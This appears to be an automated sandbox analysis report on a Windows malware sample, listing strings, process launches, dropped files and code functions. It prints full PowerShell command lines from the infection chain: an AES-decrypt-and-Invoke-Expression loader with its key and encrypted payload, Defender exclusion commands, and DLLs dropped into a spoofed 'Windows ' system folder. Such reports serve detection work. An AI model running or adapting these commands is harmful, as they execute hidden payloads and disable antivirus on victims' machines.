    Source: svchost.exe, 00000009.00000002.1369086811.000001DEFEA81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
    Source: svchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
    Source: svchost.exe, 00000009.00000003.1368119081.000001DEFEA67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
    Source: svchost.exe, 00000009.00000002.1369086811.000001DEFEA81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
    Source: svchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
    Source: svchost.exe, 00000009.00000002.1368953627.000001DEFEA3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368321157.000001DEFEA5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368140177.000001DEFEA62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
    Source: svchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
    Source: svchost.exe, 00000009.00000002.1368882682.000001DEFEA27000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368119081.000001DEFEA67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
    Source: svchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
    Source: svchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
    Source: svchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
    Source: svchost.exe, 00000009.00000002.1368953627.000001DEFEA3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368140177.000001DEFEA62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
    Source: svchost.exe, 00000009.00000003.1368376183.000001DEFEA41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1368970767.000001DEFEA44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
    Source: svchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
    Source: svchost.exe, 00000009.00000003.1368140177.000001DEFEA62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368376183.000001DEFEA41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
    Source: svchost.exe, 00000009.00000003.1368140177.000001DEFEA62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368376183.000001DEFEA41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
    Source: svchost.exe, 00000009.00000002.1368970767.000001DEFEA44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
    Source: svchost.exe, 00000009.00000003.1368140177.000001DEFEA62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
    Source: svchost.exe, 00000009.00000003.1368214670.000001DEFEA5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368376183.000001DEFEA41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
    Source: svchost.exe, 00000009.00000003.1368376183.000001DEFEA41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1369032766.000001DEFEA65000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1368970767.000001DEFEA44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
    Source: svchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
    Source: svchost.exe, 00000009.00000002.1368882682.000001DEFEA27000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368119081.000001DEFEA67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
    Source: edb.log.3.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
    Source: svchost.exe, 00000003.00000003.1202792782.00000150FC750000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2/C:
    Source: powershell.exe, 00000022.00000002.1899492113.000001C7BF588000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000022.00000002.1899492113.000001C7C0D11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
    Source: svchost.exe, svchost.exe, 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp, x338625.dat.31.dr, usvc.dat.31.drString found in binary or memory: https://ipinfo.io/json
    Source: powershell.exe, 00000022.00000002.1998067590.000001C7CF3D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
    Source: svchost.exe, 00000009.00000003.1368418759.000001DEFEA32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net
    Source: svchost.exe, 00000009.00000003.1368376183.000001DEFEA41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
    Source: svchost.exe, 00000009.00000003.1368338734.000001DEFEA4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
    Source: svchost.exe, 00000009.00000003.1368418759.000001DEFEA32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368376183.000001DEFEA41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368338734.000001DEFEA4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
    Source: svchost.exe, 00000009.00000002.1368882682.000001DEFEA27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
    Source: svchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
    Source: svchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=
    Source: svchost.exe, 0000002E.00000002.2329342995.00000000660F4000.00000008.00000001.01000000.0000001D.sdmp, usvc.dat.31.drString found in binary or memory: https://www.gnu.org/licenses/
    Source: svchost.exeString found in binary or memory: https://www.openssl.org/
    Source: svchost.exe, 0000002E.00000002.2388271854.00007FFA2CEE1000.00000002.00000001.01000000.00000018.sdmp, svchost.exe, 0000002E.00000002.2383458007.00007FFA244AE000.00000002.00000001.01000000.0000001B.sdmp, libcrypto-3-x64.dll.31.dr, libssl-3-x64.dll.31.dr, usvc.dat.31.drString found in binary or memory: https://www.openssl.org/H
    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
    Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.17:49726 version: TLS 1.2
    Source: C:\Program Files\7-Zip\7zFM.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA330F1180 CryptAcquireContextW,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,51_2_00007FFA330F1180

    System Summary

    barindex
    Malicious sample detected (through community Yara rule)
    Source: Process Memory Space: powershell.exe PID: 3740, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
    Found suspicious ZIP file
    Source: x447823.zip.16.drZip Entry: x447823.vbs
    Windows Scripting host queries suspicious COM object (likely to drop second stage)
    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
    Wscript starts Powershell (via cmd or directly)
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rootdir\x615759.bat" "
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [System.Security.Cryptography.Aes]::Create(); $aee.Key = $ky; $aee.IV = $vv; $decr = $aee.CreateDecryptor($aee.Key, $aee.IV); $ciptbyt = [System.Convert]::FromBase64String($cptx); $decrbyt = $decr.TransformFinalBlock($ciptbyt, 0, $ciptbyt.Length); return [System.Text.Encoding]::UTF8.GetString($decrbyt); } $b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB2UEe39wbWt2wfYJn+M6AjL2oz3gIgcocur6WCc/5IYLV6c3HjNhgfxV59aCFOKqxmKXu/mfoJbe45VyAXPin5ErM20zro4fLljjJuxjliX/F0TOK8TE1CgAQLpE0b+Bo2x4Qgs6hRalwuJuorg9Gjhgh'; $ky = [byte[]](0x1E, 0x5B, 0x26, 0xF0, 0x75, 0x52, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE4, 0x98, 0xE4); $vv = [byte[]](0x10, 0x5B, 0x26, 0xE1, 0x75, 0x51, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE1, 0x88, 0xFF); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; Invoke-Expression $pcmd;"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'c:\windows\system32';"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'E:\';"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'F:\';"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rootdir\x615759.bat" "Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [System.Security.Cryptography.Aes]::Create(); $aee.Key = $ky; $aee.IV = $vv; $decr = $aee.CreateDecryptor($aee.Key, $aee.IV); $ciptbyt = [System.Convert]::FromBase64String($cptx); $decrbyt = $decr.TransformFinalBlock($ciptbyt, 0, $ciptbyt.Length); return [System.Text.Encoding]::UTF8.GetString($decrbyt); } $b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB2UEe39wbWt2wfYJn+M6AjL2oz3gIgcocur6WCc/5IYLV6c3HjNhgfxV59aCFOKqxmKXu/mfoJbe45VyAXPin5ErM20zro4fLljjJuxjliX/F0TOK8TE1CgAQLpE0b+Bo2x4Qgs6hRalwuJuorg9Gjhgh'; $ky = [byte[]](0x1E, 0x5B, 0x26, 0xF0, 0x75, 0x52, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE4, 0x98, 0xE4); $vv = [byte[]](0x10, 0x5B, 0x26, 0xE1, 0x75, 0x51, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE1, 0x88, 0xFF); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; Invoke-Expression $pcmd;"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'c:\windows\system32';"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'E:\';"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'F:\';"
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CF15730: CreateDirectoryA,CreateFileA,GetLastError,strchr,strchr,MultiByteToWideChar,DeviceIoControl,GetLastError,_errno,GetLastError,FormatMessageA,libintl_gettext,__acrt_iob_func,LocalFree,CloseHandle,RemoveDirectoryA,_errno,CloseHandle,46_2_00007FFA2CF15730
    Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
    Source: C:\Windows\System32\cmd.exeFile created: C:\WindowsJump to behavior
    Source: C:\Windows\System32\cmd.exeFile created: C:\Windows \System32Jump to behavior
    Source: C:\Windows\System32\cmd.exeFile created: C:\Windows \System32\010101Jump to behavior
    Source: C:\Windows\System32\xcopy.exeFile created: C:\Windows \System32\printui.exe
    Source: C:\Windows\System32\xcopy.exeFile created: C:\Windows \System32\x249569.dat
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\usvc.dat
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\winsvcf
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\winsvcf\winlogsvc
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libcurl.dll
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\zlib1.dll
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libcrypto-3-x64.dll
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libiconv-2.dll
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libintl-9.dll
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libssl-3-x64.dll
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libwinpthread-1.dll
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\console_zero.exe
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libpq.dll
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\ucrtbased.dll
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\vcruntime140d.dll
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\x338625.dat
    Source: C:\Windows\System32\cmd.exeFile deleted: C:\Windows \System32\010101
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C514134834_2_00007FF9C5141348
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C51421DD34_2_00007FF9C51421DD
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C550EF5A34_2_00007FF9C550EF5A
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C5507E5534_2_00007FF9C5507E55
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C5506DFB34_2_00007FF9C5506DFB
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C5500E6534_2_00007FF9C5500E65
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C54FD65934_2_00007FF9C54FD659
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C54F967E34_2_00007FF9C54F967E
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C550751D34_2_00007FF9C550751D
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C550CD7D34_2_00007FF9C550CD7D
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C54F259234_2_00007FF9C54F2592
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C54F103E34_2_00007FF9C54F103E
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C550E03834_2_00007FF9C550E038
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C54FEFF434_2_00007FF9C54FEFF4
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C550C80D34_2_00007FF9C550C80D
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C550A7ED34_2_00007FF9C550A7ED
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C54F806D34_2_00007FF9C54F806D
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C550C05D34_2_00007FF9C550C05D
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C54FD88734_2_00007FF9C54FD887
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C54F288034_2_00007FF9C54F2880
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C550B74734_2_00007FF9C550B747
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C550E71034_2_00007FF9C550E710
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C550EFA934_2_00007FF9C550EFA9
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C550B2BB34_2_00007FF9C550B2BB
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C5507ABB34_2_00007FF9C5507ABB
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C54F127F34_2_00007FF9C54F127F
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C5506A7B34_2_00007FF9C5506A7B
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C54F912234_2_00007FF9C54F9122
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C550014534_2_00007FF9C5500145
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C55070DD34_2_00007FF9C55070DD
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C550A15D34_2_00007FF9C550A15D
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C550117934_2_00007FF9C5501179
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C54F843834_2_00007FF9C54F8438
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C550D42B34_2_00007FF9C550D42B
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C54FECC534_2_00007FF9C54FECC5
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C54F1CBD34_2_00007FF9C54F1CBD
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C54FA4B934_2_00007FF9C54FA4B9
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C550A48D34_2_00007FF9C550A48D
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C550045934_2_00007FF9C5500459
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C54FD49434_2_00007FF9C54FD494
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C550845D34_2_00007FF9C550845D
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C550C35534_2_00007FF9C550C355
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C55072FD34_2_00007FF9C55072FD
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C550538B34_2_00007FF9C550538B
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C58B26F334_2_00007FF9C58B26F3
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C58BB66C34_2_00007FF9C58BB66C
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C58B827034_2_00007FF9C58B8270
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C58B1A7034_2_00007FF9C58B1A70
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C58B1A5534_2_00007FF9C58B1A55
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C5B8124934_2_00007FF9C5B81249
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C5B711B434_2_00007FF9C5B711B4
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C5B7345534_2_00007FF9C5B73455
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_649504E446_2_649504E4
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_6600A23046_2_6600A230
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_6601076046_2_66010760
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_6600981046_2_66009810
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_6600BC9046_2_6600BC90
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_660050A046_2_660050A0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_66019CB046_2_66019CB0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_6600ACD046_2_6600ACD0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_66004CE046_2_66004CE0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_6600DD2046_2_6600DD20
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_6600CD6046_2_6600CD60
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_6600E58046_2_6600E580
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_6600D5A046_2_6600D5A0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_660121B046_2_660121B0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_6828A0B046_2_6828A0B0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_6828C22046_2_6828C220
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_68281C1046_2_68281C10
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_6828350046_2_68283500
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_682926C146_2_682926C1
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE84CD046_2_00007FFA2CE84CD0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE94CC046_2_00007FFA2CE94CC0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE30EB046_2_00007FFA2CE30EB0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE6EDC046_2_00007FFA2CE6EDC0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE82FA046_2_00007FFA2CE82FA0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE970A046_2_00007FFA2CE970A0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE4CA9046_2_00007FFA2CE4CA90
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CEA69E046_2_00007FFA2CEA69E0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE78B6046_2_00007FFA2CE78B60
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE8CB3046_2_00007FFA2CE8CB30
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE8059046_2_00007FFA2CE80590
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE9055046_2_00007FFA2CE90550
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE8E4E046_2_00007FFA2CE8E4E0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE8A6B046_2_00007FFA2CE8A6B0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE3C61046_2_00007FFA2CE3C610
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE6C70046_2_00007FFA2CE6C700
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE7E0F046_2_00007FFA2CE7E0F0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CEAC28046_2_00007FFA2CEAC280
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE5C24046_2_00007FFA2CE5C240
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE6C21046_2_00007FFA2CE6C210
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE2221046_2_00007FFA2CE22210
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE6835046_2_00007FFA2CE68350
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE422E046_2_00007FFA2CE422E0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE8A2E046_2_00007FFA2CE8A2E0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CEA1D3046_2_00007FFA2CEA1D30
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE99CC146_2_00007FFA2CE99CC1
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE4DEA046_2_00007FFA2CE4DEA0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE95E8046_2_00007FFA2CE95E80
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE2C03046_2_00007FFA2CE2C030
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE5202046_2_00007FFA2CE52020
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE87FE046_2_00007FFA2CE87FE0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE3B95046_2_00007FFA2CE3B950
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE938C046_2_00007FFA2CE938C0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE2FBB046_2_00007FFA2CE2FBB0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE7DAD046_2_00007FFA2CE7DAD0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE23C4046_2_00007FFA2CE23C40
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CEA9C4046_2_00007FFA2CEA9C40
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE85C2046_2_00007FFA2CE85C20
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE834C046_2_00007FFA2CE834C0
